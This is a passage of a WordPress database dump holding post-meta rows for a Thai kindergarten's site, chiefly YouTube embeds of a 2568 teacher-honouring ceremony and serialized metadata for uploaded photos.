(1558,495,'title_style','default'),
(1559,495,'_title_style','field_5d1a0217cf408'),
(1560,495,'related',''),
(1561,495,'_related','field_603b51c3e183e'),
(1562,490,'_thumbnail_id','494'),
(1567,496,'title_style','default'),
(1568,496,'_title_style','field_5d1a0217cf408'),
(1569,496,'related',''),
(1570,496,'_related','field_603b51c3e183e'),
(1571,498,'title_style','default'),
(1572,498,'_title_style','field_5d1a0217cf408'),
(1574,19,'_oembed_250afacf58743b312f93d0c2de96997e','<iframe title=\"พิธีไหว้ครู ปี 2568 โรงเรียนอนุบาลวัดพระโต\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/C9do6YkaRVU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>'),
(1575,19,'_oembed_time_250afacf58743b312f93d0c2de96997e','1751006829'),
(1576,500,'title_style','default'),
(1577,500,'_title_style','field_5d1a0217cf408'),
(1579,19,'_oembed_deb81365cfbd7fc9dab55f253a6a7edc','<iframe title=\"การแสดงวันไหว้ครู2568\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/LVfYUq7zwYQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>'),
(1580,19,'_oembed_time_deb81365cfbd7fc9dab55f253a6a7edc','1751010452'),
(1581,502,'title_style','default'),
(1582,502,'_title_style','field_5d1a0217cf408'),
(1583,19,'_oembed_38b424028a30e41dddb6b2003dea19a9','<iframe title=\"พิธีไหว้ครู ปี 2568 โรงเรียนอนุบาลวัดพระโต\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/C9do6YkaRVU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>'),
(1584,19,'_oembed_time_38b424028a30e41dddb6b2003dea19a9','1763009996'),
(1585,503,'title_style','default'),
(1586,503,'_title_style','field_5d1a0217cf408'),
(1587,504,'_edit_lock','1751008096:1'),
(1588,505,'_wp_attached_file','2025/06/510226912_122233485428202781_3363047737425267891_n.jpg'),
(1589,505,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2025/06/510226912_122233485428202781_3363047737425267891_n.jpg\";s:8:\"filesize\";i:579804;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"510226912_122233485428202781_3363047737425267891_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26550;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"510226912_122233485428202781_3363047737425267891_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207115;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"510226912_122233485428202781_3363047737425267891_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10300;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"510226912_122233485428202781_3363047737425267891_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217453;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:364266;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"510226912_122233485428202781_3363047737425267891_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22739;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1590,506,'_wp_attached_file','2025/06/508566839_122233488350202781_5291093760071081349_n.jpg'),
(1591,506,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508566839_122233488350202781_5291093760071081349_n.jpg\";s:8:\"filesize\";i:381873;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508566839_122233488350202781_5291093760071081349_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19454;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508566839_122233488350202781_5291093760071081349_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137193;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508566839_122233488350202781_5291093760071081349_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7990;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508566839_122233488350202781_5291093760071081349_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86082;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508566839_122233488350202781_5291093760071081349_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246217;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508566839_122233488350202781_5291093760071081349_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21683;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1592,507,'_wp_attached_file','2025/06/508515966_122233488296202781_3641426539455570755_n.jpg'),
(1593,507,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508515966_122233488296202781_3641426539455570755_n.jpg\";s:8:\"filesize\";i:459399;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508515966_122233488296202781_3641426539455570755_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21932;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508515966_122233488296202781_3641426539455570755_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161909;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508515966_122233488296202781_3641426539455570755_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9038;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508515966_122233488296202781_3641426539455570755_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100138;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508515966_122233488296202781_3641426539455570755_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292648;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508515966_122233488296202781_3641426539455570755_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22804;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1594,508,'_wp_attached_file','2025/06/509255489_122233488332202781_3849008079105916440_n.jpg'),
(1595,508,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509255489_122233488332202781_3849008079105916440_n.jpg\";s:8:\"filesize\";i:337257;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509255489_122233488332202781_3849008079105916440_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20211;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509255489_122233488332202781_3849008079105916440_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509255489_122233488332202781_3849008079105916440_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8532;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509255489_122233488332202781_3849008079105916440_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81551;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509255489_122233488332202781_3849008079105916440_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219597;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509255489_122233488332202781_3849008079105916440_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18626;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1596,509,'_wp_attached_file','2025/06/509432476_122233488362202781_6256446827292890718_n.jpg'),
(1597,510,'_wp_attached_file','2025/06/510004299_122233487084202781_6268732022722924528_n.jpg'),
(1598,511,'_wp_attached_file','2025/06/509561039_122233485938202781_5092953145952209112_n.jpg'),
(1599,509,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509432476_122233488362202781_6256446827292890718_n.jpg\";s:8:\"filesize\";i:399776;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509432476_122233488362202781_6256446827292890718_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19723;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509432476_122233488362202781_6256446827292890718_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141159;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509432476_122233488362202781_6256446827292890718_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8168;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509432476_122233488362202781_6256446827292890718_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88080;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509432476_122233488362202781_6256446827292890718_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254723;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509432476_122233488362202781_6256446827292890718_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1600,511,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509561039_122233485938202781_5092953145952209112_n.jpg\";s:8:\"filesize\";i:345883;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509561039_122233485938202781_5092953145952209112_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18638;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509561039_122233485938202781_5092953145952209112_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126165;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509561039_122233485938202781_5092953145952209112_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8489;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509561039_122233485938202781_5092953145952209112_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80219;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509561039_122233485938202781_5092953145952209112_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223864;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509561039_122233485938202781_5092953145952209112_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18398;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1601,510,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/510004299_122233487084202781_6268732022722924528_n.jpg\";s:8:\"filesize\";i:298060;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"510004299_122233487084202781_6268732022722924528_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16573;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"510004299_122233487084202781_6268732022722924528_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106889;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"510004299_122233487084202781_6268732022722924528_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"510004299_122233487084202781_6268732022722924528_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68102;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"510004299_122233487084202781_6268732022722924528_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190491;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"510004299_122233487084202781_6268732022722924528_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15932;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1602,512,'_wp_attached_file','2025/06/510905776_122233487132202781_8330824708694035019_n.jpg'),
(1603,512,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/510905776_122233487132202781_8330824708694035019_n.jpg\";s:8:\"filesize\";i:336400;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"510905776_122233487132202781_8330824708694035019_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18765;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"510905776_122233487132202781_8330824708694035019_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122858;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"510905776_122233487132202781_8330824708694035019_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7795;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"510905776_122233487132202781_8330824708694035019_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"510905776_122233487132202781_8330824708694035019_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217631;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"510905776_122233487132202781_8330824708694035019_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17566;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1606,504,'_edit_last','1'),
(1608,504,'title_style','default'),
(1609,504,'_title_style','field_5d1a0217cf408'),
(1610,504,'related',''),
(1611,504,'_related','field_603b51c3e183e'),
(1612,513,'title_style','default'),
(1613,513,'_title_style','field_5d1a0217cf408'),
(1614,513,'related',''),
(1615,513,'_related','field_603b51c3e183e'),
(1617,504,'_thumbnail_id','505'),
(1620,514,'_edit_lock','1751008457:1'),
(1621,515,'_wp_attached_file','2025/06/508515966_122233488296202781_3641426539455570755_n-1.jpg'),
(1622,515,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/508515966_122233488296202781_3641426539455570755_n-1.jpg\";s:8:\"filesize\";i:459399;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"508515966_122233488296202781_3641426539455570755_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21932;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"508515966_122233488296202781_3641426539455570755_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161909;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"508515966_122233488296202781_3641426539455570755_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9038;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"508515966_122233488296202781_3641426539455570755_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100138;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"508515966_122233488296202781_3641426539455570755_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292648;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"508515966_122233488296202781_3641426539455570755_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22804;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1623,516,'_wp_attached_file','2025/06/509561039_122233485938202781_5092953145952209112_n-1.jpg'),
(1624,517,'_wp_attached_file','2025/06/509255489_122233488332202781_3849008079105916440_n-1.jpg'),
(1625,518,'_wp_attached_file','2025/06/509432476_122233488362202781_6256446827292890718_n-1.jpg'),
(1626,516,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/509561039_122233485938202781_5092953145952209112_n-1.jpg\";s:8:\"filesize\";i:345883;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"509561039_122233485938202781_5092953145952209112_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18638;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"509561039_122233485938202781_5092953145952209112_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126165;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"509561039_122233485938202781_5092953145952209112_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8489;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"509561039_122233485938202781_5092953145952209112_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80219;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"509561039_122233485938202781_5092953145952209112_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223864;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"509561039_122233485938202781_5092953145952209112_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18398;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1627,517,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2025/06/509255489_122233488332202781_3849008079105916440_n-1.jpg\";s:8:\"filesize\";i:337257;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"509255489_122233488332202781_3849008079105916440_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20211;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"509255489_122233488332202781_3849008079105916440_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"509255489_122233488332202781_3849008079105916440_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8532;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"509255489_122233488332202781_3849008079105916440_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81551;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"509255489_122233488332202781_3849008079105916440_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219597;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"509255489_122233488332202781_3849008079105916440_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18626;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"k